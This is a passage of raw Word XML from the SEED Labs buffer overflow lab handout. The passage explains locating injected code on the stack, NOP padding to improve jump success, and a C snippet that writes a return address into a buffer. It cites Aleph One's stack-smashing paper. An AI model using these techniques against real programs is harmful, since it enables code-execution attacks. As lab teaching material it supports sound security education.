                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT"/>
                        <w:spacing w:val="-5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Jump</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:asci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to</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:asci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the</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:asci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malicious</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:asci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code</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:6923;top:5471;width:1247;height:134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(b)</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT"/>
                        <w:spacing w:val="-5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Improve</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:asci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the</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial MT"/>
                        <w:spacing w:val="-5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chance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91.553833pt;margin-top:140.463852pt;width:8.7pt;height:68pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:15730688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 MT" w:hAnsi="Arial MT"/>
                      <w:sz w:val="12"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                      <w:sz w:val="12"/>
                    </w:rPr>
                    <w:t>Stack’s</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                      <w:spacing w:val="-7"/>
                      <w:sz w:val="12"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                      <w:sz w:val="12"/>
                    </w:rPr>
                    <w:t>growing</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                      <w:spacing w:val="-7"/>
                      <w:sz w:val="12"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                      <w:sz w:val="12"/>
                    </w:rPr>
                    <w:t>direction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</w:rPr>
        <w:t>Finding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="4"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>starting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>code.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>accurately</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>calculate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address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rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>buffer[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-49"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>you should be able to accurately calcuate the starting point of the malicious code. Even if you cannot accu-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>rately calculate the address (for example, for remote programs), you can still guess. To improve the chance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of success, we can add a number of NOPs to the beginning of the malcious code; therefore, if we can jump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to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NOPs,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eventually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malicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>code.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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figure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>depicts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attack.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77.92067pt;margin-top:9.721302pt;width:109.7pt;height:157.8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8"/>
                    <w:gridCol w:w="82"/>
                    <w:gridCol w:w="1932"/>
                  </w:tblGrid>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="705" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="250" w:type="dxa"/>
                        <w:gridSpan w:val="2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32" w:type="dxa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Malicious</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT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Code</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="777" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="168" w:type="dxa"/>
                        <w:vMerge w:val="restart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" w:type="dxa"/>
                        <w:vMerge w:val="restart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3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168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2" w:type="dxa"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:line="240" w:lineRule="auto" w:before="61"/>
                          <w:ind w:left="7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str</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="133" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="168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2" w:type="dxa"/>
                        <w:vMerge w:val="restart"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:line="240" w:lineRule="auto" w:before="61"/>
                          <w:ind w:left="551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Return</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT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Address</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="133" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="250" w:type="dxa"/>
                        <w:gridSpan w:val="2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32" w:type="dxa"/>
                        <w:vMerge/>
                        <w:tcBorders>
                          <w:top w:val="nil"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="FF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250" w:type="dxa"/>
                        <w:gridSpan w:val="2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2" w:type="dxa"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:line="240" w:lineRule="auto" w:before="61"/>
                          <w:ind w:left="8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Previous</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT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FP</w:t>
                        </w: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250" w:type="dxa"/>
                        <w:gridSpan w:val="2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2" w:type="dxa"/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63" w:val="left" w:leader="dot"/>
                          </w:tabs>
                          <w:spacing w:line="240" w:lineRule="auto"/>
                          <w:ind w:left="7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buffer</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT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[0]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Arial MT"/>
                            <w:sz w:val="12"/>
                          </w:rPr>
                          <w:t>buffer</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT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[11]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250" w:type="dxa"/>
                        <w:gridSpan w:val="2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7.450195pt;margin-top:9.721302pt;width:109.7pt;height:157.8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8"/>
                    <w:gridCol w:w="82"/>
                    <w:gridCol w:w="1932"/>
                  </w:tblGrid>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="705" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="250" w:type="dxa"/>
                        <w:gridSpan w:val="2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32" w:type="dxa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Malicious</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT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Code</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="130" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="168" w:type="dxa"/>
                        <w:vMerge w:val="restart"/>
                        <w:tcBorders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" w:type="dxa"/>
                        <w:vMerge w:val="restart"/>
                        <w:tcBorders>
                          <w:top w:val="nil"/>
                          <w:left w:val="nil"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="959595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32" w:type="dxa"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="959595"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:line="111" w:lineRule="exact"/>
                          <w:ind w:left="8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NOP</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="128" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="168" w:type="dxa"/>
                        <w:vMerge/>
                        <w:tcBorders>
                          <w:top w:val="nil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959595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2" w:type="dxa"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="959595"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:line="108" w:lineRule="exact"/>
                          <w:ind w:left="8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NOP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168" w:type="dxa"/>
                        <w:vMerge/>
                        <w:tcBorders>
                          <w:top w:val="nil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959595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2" w:type="dxa"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="959595"/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8"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                            <w:sz w:val="12"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT"/>
                            <w:sz w:val="12"/>
                          </w:rPr>
                          <w:t>……</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT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z w:val="12"/>
                          </w:rPr>
                          <w:t>(many</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT" w:hAnsi="Arial MT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z w:val="12"/>
                          </w:rPr>
                          <w:t>NOP’s)</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="128" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="168" w:type="dxa"/>
                        <w:vMerge/>
                        <w:tcBorders>
                          <w:top w:val="nil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959595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2" w:type="dxa"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="959595"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:line="108" w:lineRule="exact"/>
                          <w:ind w:left="8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NOP</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="130" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="168" w:type="dxa"/>
                        <w:vMerge w:val="restart"/>
                        <w:tcBorders>
                          <w:top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959595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168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959595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2" w:type="dxa"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:line="240" w:lineRule="auto" w:before="61"/>
                          <w:ind w:left="7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str</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="133" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="168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959595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2" w:type="dxa"/>
                        <w:vMerge w:val="restart"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:line="240" w:lineRule="auto" w:before="61"/>
                          <w:ind w:left="551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Return</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT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Address</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr>
                    <w:trPr>
                      <w:trHeight w:val="133" w:hRule="atLeast"/>
                    </w:trPr>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="250" w:type="dxa"/>
                        <w:gridSpan w:val="2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32" w:type="dxa"/>
                        <w:vMerge/>
                        <w:tcBorders>
                          <w:top w:val="nil"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="FF00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250" w:type="dxa"/>
                        <w:gridSpan w:val="2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2" w:type="dxa"/>
                      </w:tcPr>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="TableParagraph"/>
                          <w:spacing w:line="240" w:lineRule="auto" w:before="61"/>
                          <w:ind w:left="8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Previous</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT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FP</w:t>
                        </w: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250" w:type="dxa"/>
                        <w:gridSpan w:val="2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2" w:type="dxa"/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63" w:val="left" w:leader="dot"/>
                          </w:tabs>
                          <w:spacing w:line="240" w:lineRule="auto"/>
                          <w:ind w:left="7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buffer</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT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[0]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Arial MT"/>
                            <w:sz w:val="12"/>
                          </w:rPr>
                          <w:t>buffer</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial MT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[11]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250" w:type="dxa"/>
                        <w:gridSpan w:val="2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47" w:lineRule="auto" w:before="105"/>
        <w:ind w:left="160" w:right="439"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Storing an long integer in a buffer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>In your exploit program, you might need to store an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>long </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>integer (4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>bytes) into an buffer starting at buffer[i]. Since each buffer space is one byte long, the integer will actually</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>occupy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>four</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>starting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buffer[i]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(i.e.,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>buffer[i]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buffer[i+3]).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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buffer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long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different</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>types, you cannot directly assign the integer to buffer; instead you can cast the buffer+i into an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>long </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>pointer,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>and then assign the integer. The following code shows how to assign an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>long </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>integer to a buffer starting at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>buffer[i]:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="208"/>
        <w:ind w:left="552"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>char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buffer[20];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="552"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-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> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>0xFFEEDD88;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="218" w:lineRule="auto"/>
        <w:ind w:left="552"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>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ptr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t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> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>(long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>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)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>(buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t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i);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="228" w:lineRule="auto"/>
        <w:ind w:left="552"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:position w:val="-3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>ptr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t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> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>addr;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="160" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="231"/>
        <w:ind w:left="632" w:hanging="364"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="42"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Aleph</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>One.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Smashing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Stack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Fun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Profit.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Phrack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Volume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>49.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr/>
          <w:t>http://www.cs.wright.edu/people/faculty/tkprasad/courses/cs781/alephOne.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:header="700" w:footer="0" w:top="1280" w:bottom="280" w:left="128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UI Gothic">
    <w:altName w:val="MS UI Gothic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48320" from="72pt,49.748001pt" to="540pt,49.748001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4.011265pt;width:228.7pt;height:16.2pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-16247808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SEED</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:b/>
                    <w:spacing w:val="-1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Labs</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:b/>
                    <w:spacing w:val="-1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–</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:b/>
                    <w:spacing w:val="-1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Buffer</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:b/>
                    <w:spacing w:val="-1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Overflow</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:b/>
                    <w:spacing w:val="-1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Vulnerability</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:b/>
